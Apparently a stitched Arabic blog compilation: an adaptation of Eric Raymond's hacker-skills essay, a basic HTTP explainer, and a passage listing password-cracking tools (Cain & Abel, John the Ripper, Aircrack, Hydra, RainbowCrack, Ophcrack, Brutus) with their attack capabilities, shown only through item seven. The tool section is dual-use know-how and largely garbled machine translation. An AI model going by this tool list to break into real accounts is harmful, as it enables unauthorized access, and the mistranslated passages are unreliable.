مهارات الهاكر الأساسية والدليل الشامل كي تصبح هاكر حقيقي.

مهارات الهاكر وطريق المعرفة : يعتقد البعض أنه بمجرد حصوله علي بعض التطبيقات أو أدوات الهاكرز ” مثل برنامج نجرات “, أنه بذلك أصبح هاكر وقادر علي  الأجهزة واختبار أنظمة الحماية للشركات الكبري والمواقع الالكترونية, وهذا الاعتقاد هو في الحقيقه بعيدآ كل البعد عن الصحة, ولهذا دعونا من خلال هذه التدوينة نتعرف علي المهارات الأساسية للهاكرز.

مهارات الهاكر الأساسية :

هناك 4 مهارات أساسية من مهارات الهاكر التي يجب أن تتقنها كمرحلة أولي للدخول في هذا المجال وهي :
1- تعلم البرمجه.
2- الحصول على أحد أنظمة يونكس مفتوحة المصدر و تعلم كيفية تشغيله و استخدامه. ” تعرف علي توزيعات لينوكس ”
3- تعلم كيفية استعمال الورلد وايد ويب WWW و كيفية كتابة أكواد HTML
4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها من الآن ” شاهد هذا الموضوع عن تعلم الانجليزية“.
طريقة تفكير الهاكر مطلوبة و لكنها لا تغني عن المهارات الأساسية التي يجب أن تتوفر لديه قبل أن يستطيع أي شخص أن يلقبه بلقب هاكر.
هذه المهارات تتغير ببطئ عما قبل مع مرور الزمن و مع خلق التكنولوجيا لمهارات جديده. فمثلا كانت هذه المهارات من قبل تتضمن تعلم لغة الآلة و مؤخرا تضمنت كتابة HTML. بالنسبة للوقت الحالي فهذه المهارات تتضمن ما هو أكثر من ذلك …

1- تعلم البرمجه :

هذه بالتأكيد هي أول مهارات الهاكر الأساسية. فإذا لم تكن تعلم أي من لغات الحاسب الآلي أنصحك بالبدأ بتعلم لغة python فهي سهلة التعلم للمبتدئين ويوجد لها وثائق تعليمية جيده. و بالرغم من كونها لغة جيده للبدأ بها فهي ليست لعبة بل انها لغة قوية و مناسبة للمشاريع الكبيرة. ولكي تتعرف أكثر لماذا لغة البايثون أنصحك بقراءة هذا المقال التفصيلي عن مميزات هذه اللغة. كما يوجد أيضآ دروس تعليمية ممتازه تجدها على موقع بايثون الرسمي. ويمكنك زيارتها من خلال هذا الرابط.
تعلم البرمجة
الجافا هي لغة برمجة جيده جدآ ويعتبر تعلمها من مهارات الهاكر الأساسية. هي أصعب من البايثون أينعم و لكنها تنتج كود أسرع من البايثون. برأي انها تمثل أفضل اختيار ثاني لك. للأسف فالتطبيق المرجع الخاص بشركة صن مازال غير حر. و لكن ليست هذه المشكلة في لغة الجافا نفسها حيث يوجد مترجمين عاليي الجودة و مفتوحين المصدر للجافا. المشكلة الحقيقية تكمن في المكتبات التي تأتي مع لغة البرمجة. المكتبات مفتوحة المصدر أقل جودة من الخاصه بشركة صن. لذلك فإذا اخترت تعلم الجافا قم بالتعلم بواسطة أحد التطبيقات مفتوحة المصدر بدلا من الاعتماد على تطبيق صن المغلق المصدر.

مهارات الهكر في تعلم البرمجة :

اعلم أنك لن تصل إلى مستوى الهاكر أو حتى المبرمج إذا تعرفت على لغة برمجة واحده أو اتنتين فهي أحد أعمدة اكتساب مهارات الهاكر.
يجب أن تتعلم كيفية التفكير في المشاكل البرمجية بشكل عام. مستقلا عن أية لغة برمجة. لكي تصبح هاكر وتكتسب مهارات الهاكر يجب أن تصل إلى مستوي حيث يمكنك تعلم لغة برمجة في أيام عن طريق ربط ما هو موجود في كتيب هذه اللغه بما تعرفه انت مسبقا. و هذا يعني تعلمك للعديد من لغات البرمجة.
اذا بدأت في التعمق في برمجة جدية فسوف يجب عليك تعلم لغة السي، قلب نظام التشغيل يونكس. لغة السي++ قريبه جدا من لغة السي، إذا تعلمت واحده فسوف يصبح من السهل عليك تعلم الأخرى. ليست أي منهما الاختيار الصحيح لكي تبدأ به. في الحقيقة كلما استطعت الابتعاد عن البرمجة بالسي كلما أصبحت أكثر انتاجية.

لغة السي هل هي بهذه الأهمية ؟

السي لغة قوية و موفرة لمصادر جهازك ولكن لكي توفر السي هذه الميزة يتوجب عليك عمل العديد من الوظائف بنفسك للتحكم في المصادر ( كالذاكرة مثلا). كل هذه الشيفرة البرمجية تزيد من احتمالات الخطأ و سوف تتطلب منك وقت أطول في تتبع الأخطاء بالبرنامج. هذه الميزة ليست في غاية الأهمية هذه الأيام مع وجود أجهزة قوية كالموجودة حاليا. يفضل استخدام لغة برمجة تقوم بإهدار مصادر الجهاز و لكنها ستقوم بتوفير وقتك مثل البايثون.

لغات برمجة أخري :

يوجد لغات أخرى تعتبر مهمة لاكتساب مهارات الهاكر من ضمنها البيرل و ليسب. البيرل مهمة لأسباب عملية، فهي تستخدم للصفحات الديناميكية و يستخدمها مديرين النظم. لذلك حتى لو لم تتعلم البرمجة بلغة بيرل فعليك أن تستطيع فهم الكود المكتوب بها. يستخدم العديد من المبرمجين البيرل بنفس الصورة التي أقترح عليك استخدام البايثون بها لتجنب البرمجة بالسي عندما لا تحتاج إلى هذا القدر من التحكم في مصادر الجهاز. سوف تحتاج أن تفهم الكود الذي يكتبه هؤلاء المبرمجين.

لماذا لغة ليسب ؟

تستحق لغة ليسب لفت الانتباه لها لسبب مختلف، بسبب التجربة الرائعة التي سوف تحظى بها عندما تصل إلى فهم هذه اللغه. هذه الخبرة سوف تجعلك مبرمج أفضل لباقية حياتك حتى لو لم تستخدم هذه اللغه كثيرا. يمكنك اكتساب خبرة بسيطه ببساطه عن طريق كتابة أو تعديل بعض الأنماط لمحرر النصوص emacs.

لغات البرمجة والهاكرز
لغات البرمجة والهاكرز

5 لغات يجب تعلمهم :

أفضل اختيار بالطبع أن تتعلم الخمس لغات. البايثون، السي، السي++، الجافا، البيرل، و الليسب. إلى جانب أنهم أهم اللغات للهاكرز فهم يمثلون تعريف بأكثر من تقنية برمجية و كل منهم سوف يعلمك شئ ذو قيمة عاليه.
لا يمكنني شرح كيفية تعلم البرمجة في هذا المقال فهي مهارة معقدة. و لكن يمكنني أن أخبرك بأن الكتب و الدورات لن يؤدوا الغرض. الكثير بل معظم الهاكرز علموا أنفسهم بأنفسهم. يمكنك تعلم شيئ بسيط من الكتب و لكن أهم مهارات الهاكر سوف تتعلمها فقط عندما تبدأ بممارسة البرمجة. ما سوف يعلمك بالشكل الصحيح هو
1- قراءة الكود البرمجي.
2- كتابة الكود البرمجي.

لغات البرمجه وتعلم اللغات البشرية :

تعلم البرمجة يكاد يكون مثل تعلم أي لغه بشريه حيث أفضل طريقة لتعلم اللغات البشريه هي قراءة بعض ما هو مكتوب من قبل أساتذة تلك اللغات و كتابة بعض الأشياء بنفسك و قراءة المزيد و كتابة المزيد حتى تبدأ كتاباتك في التطور لتصل إلى المستوى الذي تريده.
كان العثور على كود لبرامج جيده صعبا بسبب وجود عدد بسيط من البرامج حرة المصدر ليتمكن الهاكرز من قرائتها و التعديل بها ولكن هذا الشئ قد تغير تماما الآن فالبرامج و نظم التشغيل و أدوات البرمجة مفتوحة المصدر و المبنية من قبل الهاكرز متوفرة الآن و هذا ما ينقلني للنقطة التالية.

2- الحصول علي أحد أنظمة ليونكس مفتوحة المصدر :

 عليك أن تقوم بالحصول على نسخة من نظام التشغيل لينكس أو نظام التشغيل من عائلة BSD و تقوم بتثبيته على جهازك والعمل به.
نعم يوجد أنظمة تشغيل أخرى و لكنها أنظمة مغلقة المصدر و تصل إليك في الشكل النهائي حيث لا يمكنك قراءة الكود المصدري للنظام ولا يمكنك التعديل به. محاولة تعلم الهاك أثناء استخدام نظام التشغيل وندوز أو ماك أو إس يشبه تماما من يحاول تعلم الرقص و هو يرتدي بذله حديدية.
يمكن التعلم باستخدام نظام MacOS X و لكن ليس كل نظام التشغيل مفتوح المصدر لك فسوف تقابل العديد من العقبات. و كن حذر لكي لا يصبح لديك العادة السيئة و هي الاعتماد على الكود مغلق المصدر الخاص بشركة أبل. إذا ركزت على مبادئ اليونكس الموجوده في النظام فسوف تتعلم شيئا مفيداً.

لماذا يحتاج الهاكرز يونكس

لماذا يونكس ؟

اليونكس هو نظام تشغيل . بينما يمكنك تعلم استخدام  بدون تعلم اليونكس لن يمكنك أن تصبح هاكر انترنت بدون تعلم اليونكس و فهمه. لهذا السبب فثقافة الهاكرز الآن متمركزة بقوة حول اليونكس ” وتعد أحد أعمدة مهارات الهاكر.
لم يكن هذا موجودا من قبل و يوجد بعض الهاكرز القدامى الغير سعيدين بهذا الشئ و لكن الصلة بين اليونكس و الانترنت أصبحت قوية لدرجة أن ميكروسوفت ليست بالقوة الكافية لتضعف هذه الصلة “.
لذلك قم بجلب نظام تشغيل مثل اليونكس، أنا أفضل اللينكس و لكن يوجد أنظمة أخرى ( نعم يمكنك تثبيت نظامي لينكس و نظام وندوز على نفس الكمبيوتر جنبا إلى جنب). تعلم النظام و قم بالعمل عليه و ادخل على الانترنت عن طريقه. إقرأ الكود و عدل به. سوف تحصل على أدوات أفضل بكثير للبرمجة من أي أدوات يمكن أن تراها على نظام التشغيل وندوز. سوف تحصل على المرح و على الكثير من المعلومات أكثر مما تتخيل أثناء استخدامك و سوف تدرك هذا الشيئ عندما تنظر إلى الوراء لترى ما كنت عليه قبل أن تصبح هاكر.
للمزيد عن اليونكس راجع هذا المقال. يمكن أن تراجع أيضا كتاب The Art Of Unix Programming.

الحصول علي نسخة لينوكس :

لكي تحصل على نسخة لينكس راجع هذه التدوينة عن أفضل توزيعات لينوكس للهاكرز وكذلك هذه التدوينة عن أفضل توزيعات اللينوكس للمبرمجين ” وكليهما يحتويان علي روابط تحميل مباشرة “. يمكنك تحميل نسخة لينكس من هناك. بالنسبة للمستخدم الجديد فلا يوجد فرق كبير بين توزيعات اللينكس المختلفه.يمكنك الحصول على المساعده بخصوص نسخ يونكس BSD من الموقع www.bsd.org. حيث يوجد درس عن مبادئ اليونكس و الانترنت.
ملاحظة: لا أنصح بتثبيت اللينكس أو BSD وحدهما على الجهاز إذا كنت مبتدئ. حاول العثور على مجموعة مستخدمي لينكس لتسألهم المساعده.

3- تعلم كيفية استعمال WWW و كيفية كتابة HTML :

معظم الأشياء التي يقوم بها الهاكرز ليست واضحه و مرئية لغير الهاكرز مثل مساعدة الجامعات و المصانع و المكاتب على العمل. ماعدا الويب، و هو لعبة الهاكرز البراقه التي حتى السياسيين يعترفون بأنها تحدث تغييرا في العالم و لهذا السبب بالإضافة إلى أسباب لأخرى يجب أن تتعلم كيفية التعامل مع الويب.
لا يعني هذا أن تتعلم كيف تتعامل مع المتصفح ( أي شخص يمكنه فعل هذا) و لكن يجب أن تتعلم كيف تقوم بكتابة صفحات الانترنت بواسطة HTML. إذا لم تكن تعرف كيف تبرمج فعندما تتعلم كتابة الصفحات بواسطة HTML سوف تتعلم بعض العادات التي سوف تساعدك على تعلم الأشياء الأخرى. قم ببناء صفحة خاصه بك. حاول دائما أن تستخدم XHTML و هي أفضل من ال HTML التقليدية. يوجد العديد من الدروس التعليمية الجيده على الانترنت، هذا واحد منها http://www.make-a-web-site.com
و لكن بناء صفحة على الانترنت لك ليس كافيا لتصبح هاكر. الويب مليئة بالصفحات الشخصية. معظمهم لا جدوى منهم ولا يوجد بهم أي محتوي ذو قيمة و ذو مظهر أبله. للمزيد عن هذا الموضوع راجع صفحة The HTML Hell Page
لكي يصبح لصفحتك قيمة يجب أن يكون بها محتوى يجذب الانتباه أو مفيد للهاكرز الآخرين. و هذا ينقلنا للنقطة التاليه.

4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها :

الانجليزية هي اللغة المعروفة كلغة أساسية لمجتمع الهاكرز و الانترنت و أنك سوف تحتاجها لكي تستطيع التعامل مع مجتمع الهاكرز.
في حوالي سنة 1991 علمت أن العديد من الهاكرز الذين يتحدثون لغات غير الانجليزي يستخدمون الانجليزية في مناقشاتهم التقنية حتى و لو كانت لغتهم الأم واحده. حيث أن اللغة الانجليزية بها مصطلحات تقنية أغنى من أي لغة أخرى و لهذا فهي أسهل في التخاطب في الأمور التقنية. و لذلك فالكتب المترجمة من الانجليزية إلى لغات أخرى ليست بنفس مستوى الكفاءة.
لينوس تورفالدس و هو فنلندي يقوم بكتابة التعليقات على الكود الذي يكتبه بالانجليزية. قدرته على التحدث بالانجليزية لعبت دورا هاماً في قدرته على العمل مع المجتمع الواسع من المطورين على الانترنت لتطوير اللينكس. و هو مثال جدير أن يحتذى به.
يمكنك الاستعانه بهذه التدوينة لتعلم الانجليزية ” اضغط هنا ”

وإلي هنا وصلنا الي نهاية تدوينة اليوم عن ” مهارات الهاكر الاساسية ” من سلسلة تدوينات كيف تصبح هاكر حقيقي. وموعدنا مع لقاء في التدوينة التاليه بإذن الله.
خالص الشكر والتقدير لـ  Eric Steven Raymond صاحب الموضوع الأصلي من موقع catb.org .


بروتكول HTTP | ماهو وما هي اهميته لكل شخص يستخدم الانترنت.

[بروتكول HTTP ]

الانترنت اصبح الان شبكة عامة يربط العالم كله مع بعضه البعض و من اجل التحكم في الشارات بين كل جهاز و اخر يجب ان يوجد بروتكولاو  دولي يحكم بين جميع الأجهزة و هنا يأتي دور بروتكول نقل البيانات الفائق او ما يعرف HTTP هيا بنا لنتعرف عليه :
عند الدخول علي أي موقع علي  دائما تري في بداية عنوان الموقع رمز HTTP او موقع امن تلاحظ وجدود في اول عنوان الموقع كلمة HTTPS لاكن ماذا تعني هذه الكلمة و ما أهميتها كشخص يستخدم  هيا بنا لنري :

كيف يعمل بروتكول نقل البيانات الفائق HTTP او HTTPS :

ما هو بروتكول HTTP
ما هو بروتكول HTTP
من المعلوم أنه قبل إرسال البيانات عبر الإنترنت يجب عنونتها من خلال البرتوكول HTTP وهو البروتوكول الذي يقوم بوضع عنونة للبيانات لكي يتعرف بروتوكول TCP على المكان الذي سوف يتم نقل البيانات من خلاله، ويستخدم برتوكول HTTP عن طريق الويب في عملية نقل البيانات من كمبيوتر إلى أخر… ويمكنك ملاحظة ذلك عندما تريد استدعاء عنوان فأنت تقوم بكتابة العنوان المطلوب مسبوقاً بـhttp:// ولذلك فإنك تعلم مباشرة أن الانترنت يستخدم البرتوكول HTTP لإحضار هذه الصفحة.
ولهذا فإن الـ TCP يعد عبارة عن ساعي البريد الذي يقوم بإيصال رسالة ما، هذه الرسالة فيها طابع بريد وعنوان وهو ما نسميه بالـ HTTP.
حيث يتم تمرير الطلب من المستعرض إلى ملقم أو خادم الويب و هو ما يعرف بـ HTTP request ، ويقوم الجهاز الخادم بالبحث في البيانات الموجودة لديه حتى يحصل على البيانات المطلوبة فإذا وجد الصفحة قام بإرسالها على شكل حزم إلى المستخدم الذي قام بطلبها باستخدام بروتوكول TCP ويعنون هذه الحزم لمستعرض الانترنت لديك باستخدام بروتوكول HTTP، ولكن إذا لم يجد خادم الويب الصفحة المطلوبة فانه يقوم بإرسال صفحة تحتوي على رسالة خطا 404، وهذه الصفحة التي أرسلت من ملقم الويب إلى المستعرض لديك تسمي HTTP response.

تعريف بروتكول HTTP :

هو عبارة عن وسيط بين المستخدم و سيرفر الانترنت يسمح للمواقع و التطبيقات بالتواصل مع بعضهم البعض بطريقة سليمة و فواعد منظمة حتي لا تحدث مشاكل.
و الان يجب ان تعرف ما هو القانون او التعليمات التي انت توافق عليها عندما ترغب بالدخول علي موقع من مواقع الانترنت.
HTTP يعتبر بروتكول قائم علي TCP/IP في نقل البيانات.
كلمة HTTP هي اختصار لكلمة (Hyper text Transport Protocol) و تم تصميم هذا البروتكول لتأمين عملية نقل بيانات ملفات HTML اثناء عملية Request Response و المستخدم العادي للإنترنت هو الذي يقوم بإرسال بيانات و السيرفر الذي يقوم باستجابة طلب مستخدم الانترنت.

خصائص بروتكول HTTP :

ما هو بروتكول HTTP
1 – انعدام الاتصال : بمعني ان بعدما ان ينتهي مستخدم الانترنت من ارسال البيانات الي السيرفر الاتصال الذي يوجد بين المستخدم و السيرفر ينقطع نهائيا و بعدما ان ينتهي السيرفر من عمل معالجة للبيانات يبدأ الوسيط (HTTP) بإعادة الاتصال مرة اخري من اجل إعادة ارسال الطلب من السيرفر الي المستخدم.
2 – انعدم تخزين الحالة : بمعني ان السيرفر و مستخدم الانترنت يجب ان يكونوا هذان الطرفان ان يتم التعرف علي تفاصيل بعضهما البعض وقت التعامل بينهما فقط و بعد انتهاء هذا التعامل يأتي دور الوسيط (HTTP) ، (HTTP) يحرص علي ان كل طرف من الطرفان ان ينسي تفاصيل الاخر تماما و لا يتذكره نهائيا و بالتالي اذا تم عمل تعامل بين نفس الطرفان في أي وقت يكون كأن هذه اول مره هذان الجهازان يتعاملوا مع بعضهم البعض.
و الان لاحظت انه يجب ان يوجد قانون او قواعد او تعليمات يحكم التعامل.
هيا بنا لنري كيف تتم عملية ارسال البيانات الي السيرفر و ارجاعها مرة اخري للمستخدم الانترنت :
1 – مستخدم الانترنت يكتب عنوان الموقع URL في متصفح الانترنت الان يعمل الوسيط (HTTP) (TCP/IP) من اجل ان يتأكد انه يوجد اتصال مبين المستخدم الانترنت و السيرفر و اذا كان هذا الاتصال يعمل بدون مشاكل يتم الموافقة علي طلب مستخدم الانترنت و يتم ارسالها الي السيرفر و بعد هذا يتم قطع هذا الاتصال لأننا تحدثنا سابقنا لماذا تتم هذه العملية السيرفر الان سوف يعالج البيانات التي تم ارسالها من المستخدم و الان يعود الاتصال مره اخري و هذه المرة يتم ارسال رسالة استجابة او HTTP Response Message و بعدما ان يتم توصيل هذه الرسالة او البيانات الي المستخدم يتم قطع الاتصال مرة اخري و كل طرف من الطرفان ينسي و لا يتذكر تفاصيل الاخر و كأن لم يحدث بينهم أي تعامل قبل هكذا و هذا يرجع الي ميزة انعدام تخزين الحالة التي تكلمنا عنها منذ قليل و تستمر هذه العملية طول ما مستخدم الانترنت يتصفح أي موقع.
لاكن الإصدارات الاولي من بروتكول HTTP لم يكن جيد في معظم الوقت المشكلة انك كنت لا تستطيع ان تطلب اكثر من شيء واحد في كل دورة و بالتالي اذا منت تملك أشياء كثيرة علي صفحة الانترنت تكون تحتاج الي دورات كثيرة لتحميل الصفحة بالكامل.
مثال بسيط للتوضيح : نفترض اذا كنت ترغب انت ان تقوم بفتح صفحة من صفحات الانترنت يوجد بها خمسة صور و الذي سوف يحدث ان يقوم البروتكول بفتح ستة صفحات الاولي لصفة HTML و الثانية للصورة الاولي و الثالثة للصورة الثانية و الرابعة للصورة الثالثة و الخامسة للصورة الرابعة و الصفحة السادسة الأخيرة للصورة الخامسة هل فهمت الان ما هو الجيل الأول.
و بعد هذا ظهر الجيل الثاني من بروتكول HTTP باسم بروتكول 1.1 او HTTP1.1 Persistent Connection و ميزة هذه انك كمستخدم للإنترنت تقدر عن طريق وصلة واحدة بين مستخدم الانترنت و السيرفر يمكنك ارسال كثير من البيانات في نفس الوقت و بالتالي توفير كثير من الوقت لتحميل صفحة من علي الإنترنت و هذه أيضا ميزة لأنها تقلل عدد الوصلات التي تم انتاجها علي (TCP/IP).
بالرجوع للمثل السابق : انك يمكنك تحميل الخمس صور عن طريق طلب واحد.
و لاكن بروتكول 1.1 HTTP Persistent Connection يوجد به امر خطير جدا و هو ان البيانات التي انت كمستخدم انترنت ترسلها الي السيرفر و السيرفر يعيد اسال هذه البيانات لك مرة اخري تكون غير مشفرة و بالتالي يكون من السهل علي الهاكرز ان يخترق هذه الإشارات او البيانات سواء اذا كنت ترسل بيانات من السيرفر او تستقبل بيانات من السيرفر و من اجل الحماية من الهاكرز ظهر بروتكول جديد باسم HTTPS لحد هنا و سوف نقف و في تدوينه قادمة بأذن الله سوف نتحدث عن بروتكول HTTPS و في التدونية القادمة سوف نتحدث عن SSL او هي اختصار لكلمة (Secure Sockets Layers) ، و TLS و هي اختصار لكلمة (Transport Layers Security) و أنواع HTTPS.

أعلى 10 أدوات تكسير كلمة السر


ما هي كلمة السر تكسير؟

كلمة السر تكسير العملية ينطوي على استرداد كلمة مرور من مواقع التخزين أو من البيانات، وأحالها إلى جهاز كمبيوتر على شبكة الاتصال. كلمة السر تكسير مصطلح يشير إلى مجموعة من التقنيات المستخدمة للحصول على كلمة المرور من نظام بيانات.
الغرض والسبب كلمة السر تكسير يشمل الحصول على وصول غير مصرح به لنظام كمبيوتر أو يمكن أن يكون استرداد كلمة مرور منسية. قد يكون هناك سبب آخر لاستخدام كلمة السر تكسير تقنية لاختبار قوة كلمة المرور لذلك لا يمكن أن الاختراق القراصنة في النظام.
كلمة السر تكسير هو الفكر يؤديها عادة تكرار العملية في الكمبيوتر الذي يتم تطبيق تركيبات مختلفة من كلمة المرور حتى تطابق تام.

القوة الغاشمة تكسير كلمة السر:

كما يمكن أن يشار مصطلح القوة الغاشمة تكسير كلمة السر بالقوة الغاشمة الهجوم. كلمة السر القوة الغاشمة تكسير عملية تخمين كلمة المرور الخاصة بكل منها، وفي هذه العملية برنامج أو أداة إنشاء عدد كبير من مجموعات كلمة المرور. أساسا أسلوب الخطأ ودرب المستخدمة من قبل البرنامج للحصول على معلومات كلمة المرور من النظام.
عادة تستخدم قوة الغاشمة هجوم المتسللين عندما يكون هناك أي فرصة للاستفادة من ضعف نظام مشفر أو بواسطة خبراء التحليل الأمن لاختبار أمان شبكة الاتصال في المنظمة. هذا الأسلوب من كلمة السر تكسير سريع جداً لكلمات مرور مدة قصيرة ولكن لكلمات مرور مدة طويلة عادة ما تستخدم أسلوب الهجوم القاموس .
الوقت الذي يستغرقه بمرور القوة الغاشمة تكسير البرمجيات الكراك كلمة السر عادة يعتمد سرعة النظام واتصال بالإنترنت.

كلمة السر تكسير الجرافيك:

الجرافيك هو معالجة وحدة، تسمى في بعض الأحيان أيضا وحدة تجهيز مرئي الرسومات. يجب علينا قبل الحديث عن زوجته كلمة السر تكسير بعض التفاهم حولالتجزئات. عندما أدخل المستخدم كلمة المرور معلومات كلمة المرور المخزنة في النموذج من التجزئة الكمبيوتر باستخدام خوارزمية التجزئة ذات اتجاه واحد.
في كلمة المرور هذه تكسير تقنية باستخدام برامج الجرافيك اتخاذ تخمين كلمة مرور وننظر من خلال خوارزمية التجزئة ومقارنتها أو مطابقته مع التجزئات القائمة حتى تطابق تام.
الجرافيك يمكن تنفيذ وظائف حسابية بالتوازي مع زوجته لديها مئات الجوهر الذي يعطي ميزة هائلة في تكسير كلمة مرور. الجرافيك أسرع بكثير من وحدة المعالجة المركزية لذلك وهذا هو السبب في استخدام GPU بدلاً من CPU.

كودا كلمة السر تكسير:

كودا حساب “بنية الجهاز الموحدة” هو نموذج لبرمجة ومنصة تقوم بإجراء العمليات الحسابية في موازاة ذلك، تم إنشاؤها بواسطة NVIDIA لمعالجة الرسومات.
يتضمن “كلمة مرور كودا” تكسير تكسير كلمات المرور باستخدام بطاقة الرسومات التي لها شريحة الجرافيك, الجرافيك يمكن تنفيذ وظائف حسابية بالتوازي وبسرعة تكسير كلمة مرور بشكل أسرع من وحدة المعالجة المركزية. وقد زوجته العديد من رقائق 32 بت على ذلك أن القيام بهذه العملية بسرعة كبيرة.
ونحن يمكن الوصول بسهولة إلى كودا من خلال المكتبات، والتوجيهات، ومع المساعدة من لغات برمجة مختلفة تتضمن C، c + +، وفورتران.

أدوات تكسير كلمة السر

أدناه هي قائمة Top10 كلمة السر تكسير الأدوات.

1-قابيل و Abel: الأعلى كلمة السر تكسير أداة لنظام التشغيل Windows

كين & Abel واحد من أعلى أداة تكسير لكلمة السر تكسير واستعادة كلمة السر لنظام التشغيل Windows.
كين & Abel يمكن استخدام تقنيات هجوم القاموس، القوة الغاشمة والهجمات تحليل الشفرات لكسر كلمات المرور المشفرة. حتى أنه يستخدم فقط ضعف النظام لكسر كلمة السر. واجهة المستخدم الرسومية لبرامج بسيطة وسهلة الاستعمال جداً. ولكن توافر الحد، الأداة الوحيدة المتاحة للأنظمة النافذة على أساس. كين & Abel أداة لديها العديد من الميزات الجيدة التي تناقش أدناه بعض من ميزات أداة:
ميزات قابيل & Abel:
  • تستخدم لتكسير WEP (الخصوصية المكافئة المثير)
  • لدينا القدرة على تسجيل المحادثة عبر الإنترنت
  • استخدام سيارة الأجرة “الشم كلمة مرور شبكة الاتصال”
  • القدرة على حل عناوين IP إلى mac.
  • يمكن الكراك فيريتي تجزئة بما في ذلك تجزئات LM و NT التجزئات PIX ودائرة الرقابة الداخلية، التجزئات RADIUS، RDP كلمات المرور والكثير أكثر من ذلك.
الموقع للتحميل:

2-جون السفاح: منصة متعددة وقوية ومرنة كلمة السر تكسير أداة

يوحنا الخارق هو مجاني متعدد أو المرور عبر منصة تكسير البرمجيات. منصة متعددة تسمى به كما أنه يجمع بين مختلف كلمة السر تكسير الميزات في حزمة واحدة.
فإنه يستخدم في المقام الأول لكلمات المرور UNIX الضعيفة الكراك ولكن أيضا متاح لينكس، ماك، ويندوز. ونحن تشغيل هذا البرنامج ضد التشفير مرور مختلفة بما في ذلك العديد من التجزئات كلمة المرور التي توجد عادة في إصدارات مختلفة من UNIX. هذه التجزئة هي DES، تجزئة LM ويندوز نت/2000/إكس بي/2003، MD5، والمؤسسة.
ميزات جون السفاح
  • داعمة مع كلمة السر القوة الغاشمة تكسير و قاموس الهجمات
  • منصة متعددة
  • متوفر مجاناً للاستخدام
  • كما يتوفر إصدار برو مع ميزات إضافية
الموقع للتحميل:

3-ايركراك: أداة سريعة وفعالة WEP/WPA تكسير

ايركراك الجمع بين أدوات مختلفة تستخدم وأي فأي، كلمات مرور WEP و WPA تكسير. مع المساعدة من هذه الأدوات يمكن أن الكراك كلمات مرور WEP/WPA بسهولة وفعالية
يمكن استخدام القوة الغاشمة وهجوم FMS، وتقنيات قاموس الهجمات لكسر كلمات مرور WEP/WPA. أساسا أنه يجمع ويحلل الحزم مشفرة ثم استخدام أداة مختلفة الكراك كلمة السر من الحزم. رغم ايركراك متوفرة لنظام التشغيل Windows ولكن هناك قضايا مختلفة مع هذا البرنامج إذا نحن نستخدم هذا في بيئة Windows، لذا فمن الأفضل عندما نستخدمها في بيئة لينكس.
ميزات ايركراك
  • داعمة مع القوة الغاشمة و قاموس الهجمات تكسير تقنيات
  • متاح ويندوز لينكس
  • المتوفرة في القرص المضغوط لايف
الموقع للتحميل:

4-التتراهيدروكانابينول هيدرا: التكسير مصادقة شبكة خدمات داعمة، متعددة

التتراهيدروكانابينول هيدرا أداة تكسير كلمة مرور شبكة اتصال سريعة عشاء. ويستخدم شبكة لكسر كلمات السر الأنظمة البعيدة.
ويمكن استخدامه لكسر كلمات سر بروتوكولات مختلفة بما في ذلك HTTPS، HTTP، FTP, SMTP، سيسكو، السير الذاتية، SQL، إلخ SMTP. سوف تعطيك خيار أن قد تقوم أنت بتوفير ملف قاموس الذي يحتوي على قائمة بكلمات السر المحتملة. فمن الأفضل عندما نستخدمها في بيئة لينكس.
ميزات من التتراهيدروكانابينول هيدرا
  • سرعة تكسير
  • متاحة لويندوز، لينكس، سولاريس ونظام التشغيل العاشر
  • يمكن إضافة وحدات جديدة بسهولة لتعزيز الميزات
  • داعمة مع القوة الغاشمة و قاموس الهجمات
الموقع للتحميل:

5-رينبووكراك: ابتكار جديد في التكسير تجزئة كلمة مرور

يستخدم برنامج RainbowCrack الجداول قوس قزح لصدع التجزئة، وبعبارة أخرى يمكن أن نقول أنه يستخدم عملية تجارية ذاكرة الوقت على نطاق واسع لتكسير كلمة السر فعالة وسريعة.
لارجيسكاليتيميميموريتراديوف عملية الحوسبة جميع التجزئات ونص عادي باستخدام خوارزمية تجزئة محددة. بعد العمليات الحسابية، يتم تخزين النتائج التي تم الحصول عليها في الجداول يسمى جدول قوس قزح. عملية إنشاء الجداول قوس قزح وقتاً طويلاً جداً ولكن عندما يعمل البرنامج القيام به سريعة جداً.
كلمة السر تكسير استخدام الجدول قوس قزح أسرع من الأسلوب هجوم القوة الغاشمة المعتادة. ومتاحة لنظام تشغيل لينكس وويندوز.
ميزات الكراك قوس قزح
  • فيريتي دعم الجداول قوس قزح
  • يعمل على ويندوز (إكس بي/فيستا/7/8) لينكس نظم التشغيل (x 86 و x86_64)
  • بسيط في الاستخدام
الموقع للتحميل:

6-أفكرك: أداة لتكسير كلمة مرور Windows

أفكرك تستخدم لكسر كلمات مرور المستخدم Windows مع مساعدة الجداول قوس قزح التي تتوفر في قرص مضغوط قابل للتمهيد منه.
Ophcrack خال تماما التنزيل، وكلمة السر المفرقع يستخدم الجداول قوس قزح لكسر كلمات مرور المستخدم Windows يستند إلى Windows. أنها عادة الشقوق LM و NTLM التجزئات. برامج واجهة المستخدم الرسومية بسيطة ويمكن تشغيله على أنظمة أساسية مختلفة.
ميزات أفكرك
  • المتوفرة لنظام التشغيل Windows ولكن أيضا متاح لينكس، ماك، يونيكس، نظام التشغيل العاشر
  • استخدامات تجزئات LM Windows وتجزئات NTLM لنظام التشغيل Windows vista.
  • قوس قزح الجداول المتاحة مجاناً وبسهولة لنظام التشغيل Windows
  • لتبسيط عملية تكسير “يعيش مؤتمر نزع السلاح” متاح
الموقع للتحميل:

7-بروتوس: مفرقعة هجوم قوة الغاشمة للأنظمة البعيدة

بروتوس هو الأسرع والأكثر مرونة، والأكثر شعبية البرمجيات المستخدمة لكسر كلمات السر النظام البعيد. تخمين كلمة المرور من خلال تطبيق التباديل المختلفة أو باستخدام قاموس.
يمكن استخدامه لمختلف بروتوكولات شبكة الاتصال بما في ذلك HTTP و FTP، IMAP، NNTP وانواع أخرى مثل الشركات الصغيرة والمتوسطة، إلخ Telnet. كما أنه يتيح لك مرفق لإنشاء نوع المصادقة الخاصة بك. ويشمل أيضا خيارات إضافية للتحميل، واستئناف، حيث يمكن أن يكون مؤقتاً عملية عند الحاجة ويمكنك استئناف العملية عندما تريد.
أنها الوحيدة المتاحة لأنظمة تشغيل windows. أداة لها قيد التي لم تستكمل منذ عام 2000.
ميزات بروتوس
  • المتاحة لنظام التشغيل Windows
  • يمكن استخدامها مع مختلف بروتوكولات الشبكة
  • أداة لديها العديد من الميزات الإضافية جيدة
